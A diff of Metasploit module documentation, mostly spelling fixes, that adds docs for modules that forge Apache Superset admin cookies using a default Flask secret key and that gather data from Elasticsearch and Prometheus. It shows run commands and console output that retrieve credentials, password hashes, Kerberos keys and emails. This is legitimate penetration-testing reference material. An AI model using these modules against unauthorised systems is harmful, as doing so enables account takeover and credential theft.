@@ -336,7 +336,7 @@ ncasCb - Show detailed ncas information, related to either call services,
 uptime - Show phone uptime.
 appPrt - Show UI's call status.
 fntPrt - Show information about fonts available on phone.
-memtop - Shows the top poiter to current memory.
+memtop - Shows the top pointer to current memory.
 removeScheduledLogEntry - debug
 addScheduledLogEntry - debug
 fatalError - Simulate fatal error for the phone.
@@ -386,8 +386,8 @@ localePrintAll - localePrintAll
 ceShow - Show Client Engine Status

 Commands 101 to 121:
-udiShow - Show Unique Device Indentifier
-show - Show Unique Device Indentifier
+udiShow - Show Unique Device Identifier
+show - Show Unique Device Identifier
 pbnShow - Display app & bootrom headers
 upr - Upgrade to a Rockpile Standalone Image
 upm - Upgrade to a Rockpile Manf Image
@@ -4,7 +4,7 @@ News module extensions v5.3.2 and earlier for TYPO3 contain an SQL injection vul

 ## Vulnerable Application

-In vulnerable versions of the news module for TYPO3, a filter for unsetting user specified values does not account for capitalization of the paramter name. This allows a user to inject values to an SQL query.
+In vulnerable versions of the news module for TYPO3, a filter for unsetting user specified values does not account for capitalization of the parameter name. This allows a user to inject values to an SQL query.

 To exploit the vulnerability, the module generates requests and sets a value for `order` and `OrderByAllowed`, which gets passed to the SQL query. The requests are constructed to reorder the display of news articles based on a character matching. This allows a blind SQL injection to be performed to retrieve a username and password hash.

@@ -28,7 +28,7 @@ The value for query parameter `id` of the page that the news extension is runnin
 - [ ] Enable the news extension
 - [ ] Import [vulnerable page](https://github.com/rapid7/metasploit-framework/files/1015777/T3D__2017-05-20_02-17-z.t3d.zip)
 - [ ] Enable page
- [ ] Verify if page is visble to unauthenticated user and note the id
+- [ ] Verify if page is visible to unauthenticated user and note the id
 - [ ] `./msfconsole -q -x 'use auxiliary/admin/http/typo3_news_module_sqli; set rhost <rhost>; set id <id>; run'`
 - [ ] Username and password hash should have been retrieved

@@ -78,7 +78,7 @@ Default is `true`.

 This option is only used when requesting a TGS.

-The Kerberos TGT to use when requesting the sevice ticket. If unset, the database will be checked'
+The Kerberos TGT to use when requesting the service ticket. If unset, the database will be checked'

 ## Scenarios

@@ -63,7 +63,7 @@ Export Kerberos encryption keys stored in the Metasploit database to a keytab fi
 # Secrets dump
 msf6 > use auxiliary/gather/windows_secrets_dump
 msf6 auxiliary(gather/windows_secrets_dump) > run smbuser=Administrator smbpass=p4$$w0rd rhosts=192.168.123.13
-... ommitted ...
+... omitted ...
 # Kerberos keys:
 Administrator:aes256-cts-hmac-sha1-96:56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01
 Administrator:aes128-cts-hmac-sha1-96:df990c21c4e8ea502efbbca3aae435ea
@@ -72,7 +72,7 @@ Administrator:des-cbc-crc:ad49d9d92f5da170
 krbtgt:aes256-cts-hmac-sha1-96:e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c
 krbtgt:aes128-cts-hmac-sha1-96:ba87b2bc064673da39f40d37f9daa9da
 krbtgt:des-cbc-md5:3ddf2f627c4cbcdc
-... ommitted ...
+... omitted ...
 [*] Auxiliary module execution completed

 # Export to keytab
@@ -94,7 +94,7 @@ Keytab entries
 1     18 (AES256)       krbtgt@adf3.local                           e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c  1970-01-01 01:00:00 +0100
 1     17 (AES128)       krbtgt@adf3.local                           ba87b2bc064673da39f40d37f9daa9da                                  1970-01-01 01:00:00 +0100
 1     3  (DES_CBC_MD5)  krbtgt@adf3.local                           3ddf2f627c4cbcdc                                                  1970-01-01 01:00:00 +0100
-... ommitted ...
+... omitted ...
 [*] Auxiliary module execution completed
 ```

@@ -168,7 +168,7 @@ tgs-req
                  ^^^^^^^^^^^^^^ authenticator value now decrypted using the previously generated keytab file
 ```

-If you have exported the `krbtgt` account to the keytab file - Wireshark will also decrypt the TGT ticket itsel. If not - Wireshark
+If you have exported the `krbtgt` account to the keytab file - Wireshark will also decrypt the TGT ticket itself. If not - Wireshark
 will generate warnings about being unable to decrypt the TGT ticket which is signed using the krbtgt account.

 Additional details: https://wiki.wireshark.org/Kerberos
@@ -56,11 +56,11 @@ The file format is determined by the extension so the file must end in either `.

 #### The JSON format
 The JSON file format is a hash with attribute name keys and ASCII-hex encoded values. These files are compatible with
-[`Certipy`'s][certipy] `template` command. This module uses the JSON file format when storing copies fo certificate to
+[`Certipy`'s][certipy] `template` command. This module uses the JSON file format when storing copies of certificate to
 disk.

 #### The YAML format
-The YAML file format is similiar to the JSON file format, but takes advantage of YAML's ability to include comments.
+The YAML file format is similar to the JSON file format, but takes advantage of YAML's ability to include comments.
 The file consists of a hash with attribute name keys and value strings. The `nTSecurityDescriptor` file can be either
 a binary string representing a literal value, or a security descriptor defined in Microsoft's [Security Descriptor
 Definition Language (SDDL)][sddl]. Premade configuration templates provided by Metasploit use this format.
@@ -32,7 +32,7 @@ Grant Write privileges for sandy to the target machine, i.e. `WS01`:
 $TargetComputer = Get-ADComputer 'WS01'
 $User = Get-ADUser 'sandy'

-# Add GenericWrite access to the user against the target coputer
+# Add GenericWrite access to the user against the target computer
 $Rights = [System.DirectoryServices.ActiveDirectoryRights] "GenericWrite"
 $ControlType = [System.Security.AccessControl.AccessControlType] "Allow"
 $InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "All"
@@ -169,7 +169,7 @@ creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D48
 creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E278$
 creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
 creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
-## oracle (10) uses usernames in the hashing, so we can't overide that here
+## oracle (10) uses usernames in the hashing, so we can't override that here
 creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
 creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
 ## oracle 11/12 H value, username is used
@@ -177,7 +177,7 @@ creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C
 ## oracle 11/12 uses a LONG format, see lib/msf/core/auxiliary/jtr.rb
 creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:$
 creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B3$
-##postgres uses username, so we can't overide that here
+##postgres uses username, so we can't override that here
 creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
 creds add user:example postgres:md5be86a79bf20fake2d58d5453c47d4860
 echo "" > /root/.msf4/john.pot
@@ -53,7 +53,7 @@ Module options (auxiliary/client/telegram/send_message):
   BOT_TOKEN                    yes       Telegram BOT token
   CHAT_ID                      no        Chat ID for the BOT
   DOCUMENT                     no        The path to the document(binary, video etc)
-   FORMATTING  Markdown         no        Message formating option (Markdown|MarkdownV2|HTML) (Accepted: Markdown, MarkdownV2, HT
+   FORMATTING  Markdown         no        Message formatting option (Markdown|MarkdownV2|HTML) (Accepted: Markdown, MarkdownV2, HT
                                          ML)
   IDFILE                       no        File containing chat IDs, one per line
   MESSAGE                      no        The message to be sent
@@ -43,7 +43,7 @@ This module authenticates to AWS IAM (Identify Access Module) to identify user a

  **LIMIT**

-  Some AWS API calls support limiting output, such that the module will only reutrn the number of instances, without detailing the configuration of each instance.  Optionally, this module's output can be filtered to minimize the query to AWS and the user output.  Alternatively, `LIMIT` can be left blank, such that all EC2 instances will be detailed.
+  Some AWS API calls support limiting output, such that the module will only return the number of instances, without detailing the configuration of each instance.  Optionally, this module's output can be filtered to minimize the query to AWS and the user output.  Alternatively, `LIMIT` can be left blank, such that all EC2 instances will be detailed.
  
  Note that the `LIMIT` parameter is imposed per region, so the total number of results may be higher than the user-specified limit, but the maximum number of results for a single region will not exceed `LIMIT`.  This behavior is due to the AWS API.
  
@@ -10,7 +10,7 @@ Please refer to [https://cablehaunt.com/](https://cablehaunt.com/) for more info

 **WS_USERNAME**

-This is the basic auth username for the spectrum analysis web service.  This is typicall default credentials such as `admin:password` but may also be something along the lines of `spectrum:spectrum`.  This will vary from manufacturer to manufacturer and ISP to ISP.
+This is the basic auth username for the spectrum analysis web service.  This is typically default credentials such as `admin:password` but may also be something along the lines of `spectrum:spectrum`.  This will vary from manufacturer to manufacturer and ISP to ISP.

 **WS_PASSWORD**

@@ -85,7 +85,7 @@ msf auxiliary(fileformat/badpdf) > set pdfinject /root/Desktop/example.pdf
 pdfinject => /root/Desktop/example.pdf
 msf auxiliary(fileformat/badpdf) > exploit

-[+] Malicious file writen to /root/Desktop/example_malicious.pdf
+[+] Malicious file written to /root/Desktop/example_malicious.pdf
 [\*] Auxiliary module execution completed
 msf auxiliary(fileformat/badpdf) > 
 
@@ -0,0 +1,100 @@
+
+## Vulnerable Application
+
+Apache Superset versions <= 2.0.0 utilize Flask with a known default secret key which is used to sign HTTP cookies.
+These cookies can therefore be forged. If a user is able to login to the site, they can decode the cookie, set their user_id to that
+of an administrator, and re-sign the cookie. This valid cookie can then be used to login as the targeted user and retrieve database
+credentials saved in Apache Superset.
+
+### App Install
+
+```
+sudo docker run -p 8088:8088 --name superset apache/superset:2.0.0
+sudo docker exec -it superset superset fab create-admin \
+              --username admin \
+              --firstname Superset \
+              --lastname Admin \
+              --email admin@superset.com \
+              --password admin
+
+sudo docker exec -it superset superset db upgrade
+sudo docker exec -it superset superset init
+```
+
+Login to the app, click 'list users' under 'Settings', then click '+'.  make a new user with 'Public' as the role.
+
+If you want any database credentials to be pulled, you'll need to configure a database as well.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/apache_superset_priv_esc`
+1. Do: `set rhost [ip]`
+1. Do: `set username [username]`
+1. Do: `set password [password]`
+1. Do: `run`
+1. You should get an admin cookie and the database credentials
+
+## Options
+
+### USERNAME
+
+The username to authenticate as. Required with no default.
+
+### PASSWORD
+
+The password for the specified username. Required with no default.
+
+### ADMIN_ID
+
+The ID of an admin account. Defaults to `1`
+
+### SECRET_KEYS_FILE
+
+A file containing secret keys to try. One per line. Defaults to `metasploit-framework/data/wordlists/superset_secret_keys.txt`
+
+## Scenarios
+
+### Superset 2.0.0 Docker image
+
+```
+msf6 > use auxiliary/gather/apache_superset_cookie_sig_priv_esc 
+msf6 auxiliary(gather/apache_superset_priv_esc) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(gather/apache_superset_priv_esc) > set username user
+username => user
+msf6 auxiliary(gather/apache_superset_priv_esc) > set password user
+password => user
+msf6 auxiliary(gather/apache_superset_priv_esc) > set verbose true
+verbose => true
+msf6 auxiliary(gather/apache_superset_priv_esc) > run
+[*] Running module against 127.0.0.1
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Apache Supset 2.0.0 is vulnerable
+[*] 127.0.0.1:8088 - CSRF Token: IjkzNDBmZmI4ZDc4M2I4NWNiYzlmNWQwOGM4NTcwZDUzZGVhZDMwZjEi.ZP8uyQ.iBpplhnMpXOZnjiV1Xh_reR_uLw
+[*] 127.0.0.1:8088 - Initial Cookie: session=eyJjc3JmX3Rva2VuIjoiOTM0MGZmYjhkNzgzYjg1Y2JjOWY1ZDA4Yzg1NzBkNTNkZWFkMzBmMSIsImxvY2FsZSI6ImVuIn0.ZP8uyQ.jHXs3u8dqoBUWeL1vjUTxXOWLAo;
+[*] 127.0.0.1:8088 - Decoded Cookie: {"csrf_token"=>"9340ffb8d783b85cbc9f5d08c8570d53dead30f1", "locale"=>"en"}
+[*] 127.0.0.1:8088 - Attempting login
+[+] 127.0.0.1:8088 - Logged in Cookie: session=.eJwNjUEKwyAQRa8isw7FYiXGG3TXfQhhojMmdDCgoaWE3L2uHnx4_50ws2BdqYIfT1BHA3yx5C0n6OCZPyhbVLKnLd_USwgrqaP8FCZsC0zX1LWLQnUFzyiVOgi18Hzsb8rgYTAPzby42DuzOBuWMLCN2gVnex2tiYTRaL63mOwBhZrTxOsPSKAxLA.ZP8uyQ.UvNg89u5vOnyFiip1diP8ABrDCY;
+.eJwNjUEKwyAQRa8isw7FYiXGG3TXfQhhojMmdDCgoaWE3L2uHnx4_50ws2BdqYIfT1BHA3yx5C0n6OCZPyhbVLKnLd_USwgrqaP8FCZsC0zX1LWLQnUFzyiVOgi18Hzsb8rgYTAPzby42DuzOBuWMLCN2gVnex2tiYTRaL63mOwBhZrTxOsPSKAxLA.ZP8uyQ.UvNg89u5vOnyFiip1diP8ABrDCY
+[*] 127.0.0.1:8088 - Checking secret key: \x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h
+[-] 127.0.0.1:8088 - Incorrect Secret Key: \x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h
+[*] 127.0.0.1:8088 - Checking secret key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
+[+] 127.0.0.1:8088 - Found secret key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
+[*] 127.0.0.1:8088 - Modified cookie: {"_flashes"=>[{" t"=>["warning", "Invalid login. Please try again."]}], "_fresh"=>false, "csrf_token"=>"9340ffb8d783b85cbc9f5d08c8570d53dead30f1", "locale"=>"en", "user_id"=>1}
+[*] 127.0.0.1:8088 - Attempting to resign with key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
+[*] 127.0.0.1:8088 - New signed cookie: eyJfZmxhc2hlcyI6W3siIHQiOlsid2FybmluZyIsIkludmFsaWQgbG9naW4uIFBsZWFzZSB0cnkgYWdhaW4uIl19XSwiX2ZyZXNoIjpmYWxzZSwiY3NyZl90b2tlbiI6IjkzNDBmZmI4ZDc4M2I4NWNiYzlmNWQwOGM4NTcwZDUzZGVhZDMwZjEiLCJsb2NhbGUiOiJlbiIsInVzZXJfaWQiOjF9.ZP8uyQ.7Rgp9a7iPK-m7NQRbWpixG62CMo
+[+] 127.0.0.1:8088 - Cookie validated to user: admin
+[+] Found Super Secret DB: postgresql://dbuser:mysecretpassword@1.1.1.1:15432/supersetdb
+[*] Done enumerating databases
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/apache_superset_priv_esc) > creds
+Credentials
+===========
+
+host           origin         service           public  private       realm  private_type  JtR Format
+----           ------         -------           ------  -------       -----  ------------  ----------
+111.222.3.444  111.222.3.444  3306/tcp (mysql)  root    my-secret-pw         Password      
+```
@@ -2,7 +2,7 @@

 [CVE-2019-1653](https://nvd.nist.gov/vuln/detail/CVE-2019-1653) (aka Cisco Bugtracker ID [CSCvg85922](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info)) is an unauthenticated disclosure of device configuration information for the Cisco RV320/RV325 small business router.  The vulnerability was responsibly disclosed by [RedTeam Pentesting GmbH](https://seclists.org/fulldisclosure/2019/Jan/52).

-An exposed remote administration interface (on :443) would allow an attacker to retrieve password hashes and other sensitive device configuration information.  On version `1.4.2.15`, the vulnerabilty is exploitable via the WAN interface on port 8007 (by default) or 443 (if remote administration is enabled), in addition to port 443 on the LAN side.  On version `1.4.2.17`, only LAN port 443 is accessible by default, but user configuration can open port 443 for remote management on the WAN side, making the device vulnerable externally.
+An exposed remote administration interface (on :443) would allow an attacker to retrieve password hashes and other sensitive device configuration information.  On version `1.4.2.15`, the vulnerability is exploitable via the WAN interface on port 8007 (by default) or 443 (if remote administration is enabled), in addition to port 443 on the LAN side.  On version `1.4.2.17`, only LAN port 443 is accessible by default, but user configuration can open port 443 for remote management on the WAN side, making the device vulnerable externally.

 More context is available from [Rapid7's blog post](https://blog.rapid7.com/2019/01/29/cisco-r-rv320-rv325-router-unauthenticated-configuration-export-vulnerability-cve-2019-1653-what-you-need-to-know/).

@@ -44,7 +44,7 @@ Files containing IP addresses to blacklist during the analysis process, one per

 ### THREADS

-Number of concurent threads needed for DNS enumeration. Default: 8
+Number of concurrent threads needed for DNS enumeration. Default: 8

 ### WORDLIST

@@ -0,0 +1,112 @@
+## Vulnerable Application
+
+This module enumerates Elasticsearch instances. It uses the REST API
+in order to gather information about the server, the cluster, nodes,
+in the cluster, indices, and pull data from those indices.
+
+### Docker
+
+Docker install is quite simple, however it won't come with any data making the results rather boring.
+However, we can use the the [oliver006/elasticsearch-test-data](https://github.com/oliver006/elasticsearch-test-data)
+repo to help auto populate our data.
+
+```
+sudo sysctl -w vm.max_map_count=262144
+git clone https://github.com/oliver006/elasticsearch-test-data.git
+cd elasticsearch-test-data
+docker-compose up --detach
+docker run --rm -it --network host oliver006/es-test-data  \
+    --es_url=http://localhost:9200  \
+    --batch_size=10000  \
+    --username=elastic \
+    --password="esbackup-password"
+```
+
+
+### Install Elasticsearch on Kali Linux
+With this install, we'll install the free community edition of Elasticsearch, which does not require authentication to the API. However,
+this is unrealistic in a production environment which will often leverage a support contract to gain authentication, a reverse proxy to
+add basic authentication, and/or a host firewall to restrict access to this API.
+
+The following instructions assume you are beginning with a fresh Kali installation as the root user.
+
+1. `useradd -M -r elasticsearch`
+2. `su elasticsearch`
+3. `cd /tmp`
+4. `curl -L -O https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.3.2.tar.gz`
+5. `tar -xvf elasticsearch-6.3.2.tar.gz`
+6. `cd elasticsearch-6.3.2/bin`
+7. `./elasticsearch`
+8. Open a new terminal
+9. In the new terminal, `curl -X PUT http://127.0.0.1:9200/msf_test` to create an index for validation purposes
+
+## Verification Steps
+1. `use auxiliary/gather/elasticsearch_enum`
+2. `set RHOSTS [ips]`
+3. `set RPORT [port]`
+4. `run`
+
+## Options
+
+## Scenarios
+### Elasticsearch 7.9.1 on Docker
+```
+msf6 > use auxiliary/gather/elasticsearch_enum
+msf6 auxiliary(gather/elasticsearch/enum) > set ssl false
+[!] Changing the SSL option's value may require changing RPORT!
+ssl => false
+msf6 auxiliary(gather/elasticsearch/enum) > set password esbackup-password
+password => esbackup-password
+msf6 auxiliary(gather/elasticsearch/enum) > set username elastic
+username => elastic
+msf6 auxiliary(gather/elasticsearch/enum) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(gather/elasticsearch/enum) > run
+
+[+] Elastic Information
+===================
+
+  Name  Cluster Name       Version  Build Type  Lucene Version
+  ----  ------------       -------  ----------  --------------
+  es01  es-docker-cluster  7.9.1    docker      8.6.2
+
+[+] Node Information
+================
+
+  IP          Transport Port  HTTP Port        Version  Name  Uptime  Ram Usage    Node Role  Master  CPU Load  Disk Usage
+  --          --------------  ---------        -------  ----  ------  ---------    ---------  ------  --------  ----------
+  172.18.0.2  9300            172.18.0.2:9200  7.9.1    es01  1.1h    5.4gb/5.7gb  dilmrt     -       12%       64.8gb/75.6gb
+  172.18.0.3  9300            172.18.0.3:9200  7.9.1    es02  1.1h    5.4gb/5.7gb  dilmrt     *       12%       64.8gb/75.6gb
+
+[+] Cluster Information
+===================
+
+  Cluster Name       Status  Number of Nodes
+  ------------       ------  ---------------
+  es-docker-cluster  yellow  2
+
+[+] Indices Information
+====================
+
+  Name       Health  Status  UUID                    Documents  Storage Usage (MB)
+  ----       ------  ------  ----                    ---------  ------------------
+  test_data  yellow  open    Y2Qms9leTf2riFN89Lik6g  100000     8MB
+
+[+] test_data data stored to /root/.msf4/loot/20230824172328_default_127.0.0.1_elasticserch.ind_635067.csv
+[+] User Information
+================
+
+  Name                    Roles                                                       Email  Metadata                                                                                         Enabled
+  ----                    -----                                                       -----  --------                                                                                         -------
+  apm_system              ["apm_system"]                                                     {"_reserved"=>true}                                                                              true
+  beats_system            ["beats_system"]                                                   {"_reserved"=>true}                                                                              true
+  elastic                 ["superuser"]                                                      {"_reserved"=>true}                                                                              true
+  kibana                  ["kibana_system"]                                                  {"_deprecated"=>true, "_deprecated_reason"=>"Please use the [kibana_system] user instead.", "_r  true
+                                                                                             eserved"=>true}
+  kibana_system           ["kibana_system"]                                                  {"_reserved"=>true}                                                                              true
+  logstash_system         ["logstash_system"]                                                {"_reserved"=>true}                                                                              true
+  remote_monitoring_user  ["remote_monitoring_collector", "remote_monitoring_agent"]         {"_reserved"=>true}                                                                              true
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -108,7 +108,7 @@ msf6 auxiliary(gather/exchange_proxylogon_collector) > run
 [*] https://172.20.2.110:443 - Selecting the first internal server found
 [*]  * targeting internal: server2
 [*] https://172.20.2.110:443 - Attempt to dump emails for <gaston.lagaffe@pwned.lab>
-[*]  * successfuly connected to: inbox
+[*]  * successfully connected to: inbox
 [*]  * selected folder: inbox (AQAYAGdhc3Rvbi5sYWdhZmYAZUBwd25lZC5sYWIALgAAA+uQmQIqiSJLiXyYWVYT65MBACRuvwACXEpAuhG13iUjVgwAAAIBDAAAAA==)
 [*]  * number of email found: 4
 [*] https://172.20.2.110:443 - Processing dump of 4 items
@@ -144,7 +144,7 @@ msf6 auxiliary(gather/exchange_proxylogon_collector) > run
 [*] https://172.20.2.110:443 - Selecting the first internal server found
 [*]  * targeting internal: server2
 [*] https://172.20.2.110:443 - Attempt to dump contacts for <gaston.lagaffe@pwned.lab>
-[*]  * successfuly connected to: contacts
+[*]  * successfully connected to: contacts
 [*]  * selected folder: contacts (AQAYAGdhc3Rvbi5sYWdhZmYAZUBwd25lZC5sYWIALgAAA+uQmQIqiSJLiXyYWVYT65MBACRuvwACXEpAuhG13iUjVgwAAAIBDgAAAA==)
 [*]  * number of contact found: 1
 [*] https://172.20.2.110:443 - Processing dump of 1 items
@@ -1,6 +1,6 @@
 ## Description

-This module will try to find Service Principal Names (SPN) that are associated with normal user accounts on the specified domain and then submit requests to retrive Ticket Granting Service (TGS) tickets for those accounts, which may be partially encrypted with the SPNs NTLM hash. After retrieving the TGS tickets, offline brute forcing attacks can be performed to retrieve the passwords for the SPN accounts.
+This module will try to find Service Principal Names (SPN) that are associated with normal user accounts on the specified domain and then submit requests to retrieve Ticket Granting Service (TGS) tickets for those accounts, which may be partially encrypted with the SPNs NTLM hash. After retrieving the TGS tickets, offline brute forcing attacks can be performed to retrieve the passwords for the SPN accounts.

 ## Verification Steps

@@ -52,7 +52,7 @@ camera snapshots.

 ## Actions
 ### Automatic
-Retrieves all information suported by this module
+Retrieves all information supported by this module
 ### Configuration
 Retrieves the camera hardware and software configuration
 ### Credentials
@@ -120,7 +120,7 @@ Device manufacturer: Hikvision.China
 Device model: DS-2CD2142FWD-IS
 Device S/N: DS-2CD2142FWD-IS2016HS77777777777
 Device MAC: bc:ad:28:ff:ff:ff
-Device firware version: V5.4.1
+Device firmware version: V5.4.1
 Device firmware release: build 160525
 Device boot version: V1.3.4
 Device boot release: 100316
@@ -7,7 +7,7 @@ of this JSON/YAML file on disk.

 Users can also run a single query by using the `RUN_SINGLE_QUERY` option and then setting
 the `QUERY_FILTER` datastore option to the filter to send to the LDAP server and `QUERY_ATTRIBUTES`
-to a comma seperated string containing the list of attributes they are interested in obtaining
+to a comma separated string containing the list of attributes they are interested in obtaining
 from the results.

 As a third option can run one of several predefined queries by setting `ACTION` to the
@@ -14,7 +14,7 @@ Note this behaviour appears to be limited to Office365, MS Exchange does not app

 Microsoft Security Response Center stated on 2017-06-28 that this issue does not "meet the bar for security servicing". As such it is not expected to be fixed any time soon.

-This script is maintaing the ability to run independently of MSF.
+This script is maintaining the ability to run independently of MSF.

 Office365's implementation of ActiveSync is vulnerable.

@@ -289,7 +289,7 @@ msf5 auxiliary(gather/peplink_bauth_sqli) > run
 [+]                                             WAN
 [+]                                     port_type
 [+]                                             ethernet
-[+]                                     actiavted
+[+]                                     activated
 [+]                             name
 [+]                                     WAN
 [+]                             enable
@@ -355,7 +355,7 @@ msf5 auxiliary(gather/peplink_bauth_sqli) > run
 [+]                                             WAN
 [+]                                     port_type
 [+]                                             ethernet
-[+]                                     actiavted
+[+]                                     activated
 [+]                             name
 [+]                                     WAN
 [+]                             enable
@@ -19,7 +19,7 @@ Additionally, set the `USERNAME` option to specify the name of a privileged user
 To setup a test environment, the following steps can be performed.

 1. Install docker [https://docker.io](docker.io)
-2. Inside any directory create the dockerfile bellow:
+2. Inside any directory create the dockerfile below:

 ```yaml
 FROM alpine:3.10.3
@@ -71,7 +71,7 @@ CMD ["php","-S","0.0.0.0:8000","-t","piwigo"]
   inside the folder that contains the `docker-compose.yml` and `Dockerfile` files.
 5. Then Piwigo's installation page should be available at http://localhost:8000
 6. Setup the database with `mysql` as url of database, **piwigo** as `username` **piwigo** as `password`
-7. Login as priviledge user and create any photo album and upload any photo to that album.
+7. Login as privilege user and create any photo album and upload any photo to that album.

 ## Verification Steps

@@ -0,0 +1,61 @@
+## Vulnerable Application
+
+This module utilizes Prometheus' API calls to gather information about
+the server's configuration, and targets. Fields which may contain
+credentials, or credential file names are then pulled out and printed.
+
+Targets may have a wealth of information, this module will print the following
+values when found:
+`__meta_gce_metadata_ssh_keys`, `__meta_gce_metadata_startup_script`,
+`__meta_gce_metadata_kube_env`, `kubernetes_sd_configs`,
+`_meta_kubernetes_pod_annotation_kubectl_kubernetes_io_last_applied_configuration`,
+`__meta_ec2_tag_CreatedBy`, `__meta_ec2_tag_OwnedBy`
+
+Shodan search: `"http.favicon.hash:-1399433489"`
+
+A docker image is [available](https://hub.docker.com/r/prom/prometheus) however
+this basic configuration has almost no interest data. Configuring it can be tricky
+as it may not start w/o being able to contact the contacted services.
+
+## Verification Steps
+
+1. Install the application or find one on the Internet
+1. Start msfconsole
+1. Do: `use auxiliary/gather/prometheus_api_gather`
+1. Do: `set rhosts [ip]`
+1. Do: `run`
+1. You should get any valuable information
+
+## Options
+
+## Scenarios
+
+### Prometheus 2.39.1
+
+```
+msf6 auxiliary(gather/prometheus_api_gather) > set rhosts 11.111.11.111
+rhosts => 11.111.11.111
+msf6 auxiliary(gather/prometheus_api_gather) > set rport 80
+rport => 80
+msf6 auxiliary(gather/prometheus_api_gather) > run
+[*] Running module against 11.111.11.111
+
+[*] 11.111.11.111:80 - Checking build info
+[+] Prometheus found, version: 2.39.1
+[*] 11.111.11.111:80 - Checking status config
+[+] YAML config saved to /root/.msf4/loot/20230815174315_default_11.111.11.111_PrometheusYAML_982929.yaml
+[+] Credentials
+===========
+
+  Name                       Config         Host  Port  Public/Username  Private/Password/Token                               Notes
+  ----                       ------         ----  ----  ---------------  ----------------------                               -----
+  kubernetes-apiservers      authorization              Bearer           /var/run/secrets/kubernetes.io/serviceaccount/token
+  kubernetes-nodes           authorization              Bearer           /var/run/secrets/kubernetes.io/serviceaccount/token
+  kubernetes-nodes-cadvisor  authorization              Bearer           /var/run/secrets/kubernetes.io/serviceaccount/token
+
+[*] 11.111.11.111:80 - Checking targets
+[+] JSON targets saved to /root/.msf4/loot/20230815174315_default_11.111.11.111_PrometheusJSON_145604.json
+[*] 11.111.11.111:80 - Checking status flags
+[+] Config file: /etc/config/prometheus.yml
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,132 @@
+## Vulnerable Application
+
+This modules connects to a Prometheus Node Exporter or Windows Exporter service
+and gathers information about the host.
+
+Tested against Docker image 1.6.1, Linux 1.6.1, and Windows 0.23.1
+
+### Install
+
+#### Docker
+
+`docker run -d --net="host" --pid="host" -v "/:/host:ro,rslave" quay.io/prometheus/node-exporter:latest --path.rootfs=/host`
+
+#### Linux
+
+[Instructions](https://prometheus.io/docs/guides/node-exporter/#installing-and-running-the-node-exporter)
+
+```
+wget https://github.com/prometheus/node_exporter/releases/download/v1.6.1/node_exporter-1.6.1.linux-amd64.tar.gz
+tar xvfz node_exporter-1.6.1.linux-amd64.tar.gz
+cd node_exporter-*.*-amd64
+./node_exporter --collector.buddyinfo --collector.cgroups --collector.drm --collector.drbd --collector.ethtool --collector.interrupts --collector.ksmd --collector.lnstat --collector.logind --collector.meminfo_numa --collector.mountstats --collector.network_route --collector.perf --collector.processes --collector.qdisc --collector.slabinfo --collector.softirqs --collector.sysctl --collector.systemd --collector.tcpstat --collector.wifi --collector.zoneinfo
+```
+
+#### Windows
+
+Download the latest release from [github](https://github.com/prometheus-community/windows_exporter/releases)
+
+Run it with the following command:
+```
+.\windows_exporter-0.23.1-amd64.exe --collectors.enabled ad,adcs,adfs,cache,cpu,cpu_info,cs,container,dfsr,dhcp,dns,exchange,fsrmquota,hyperv,iis,logical_disk,logon,memory,mscluster_cluster,mscluster_network,mscluster_node,mscluster_resource,mscluster_resourcegroup,msmq,mssql,netframework_clrexceptions,netframework_clrinterop,netframework_clrjit,netframework_clrloading,netframework_clrlocksandthreads,netframework_clrmemory,netframework_clrremoting,netframework_clrsecurity,net,os,process,remote_fx,scheduled_task,service,smtp,system,tcp,teradici_pcoip,time,thermalzone,terminal_services,textfile,vmware_blast,vmware
+```
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/prometheus_node_exporter_gather`
+1. Do: `set rhosts [ip]`
+1. Do: `run`
+1. You should get information back about the host.
+
+## Options
+
+## Scenarios
+
+### Docker 1.6.1
+
+```
+msf6 > use auxiliary/gather/prometheus_node_exporter_gather 
+msf6 auxiliary(gather/prometheus_node_exporter_gather) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(gather/prometheus_node_exporter_gather) > set verbose true
+verbose => true
+msf6 auxiliary(gather/prometheus_node_exporter_gather) > run
+[*] Running module against 127.0.0.1
+
+[*] 127.0.0.1:9100 - Checking 
+[+] 127.0.0.1:9100 - Prometheus Node Exporter version: 1.6.1
+[+] Go Version: go1.20.6
+[+] SELinux enabled: 0
+[+] Timezone: UTC
+[+] BIOS Information
+================
+
+  Field              Value
+  -----              -----
+  Asset Tag
+  Board Name         000000
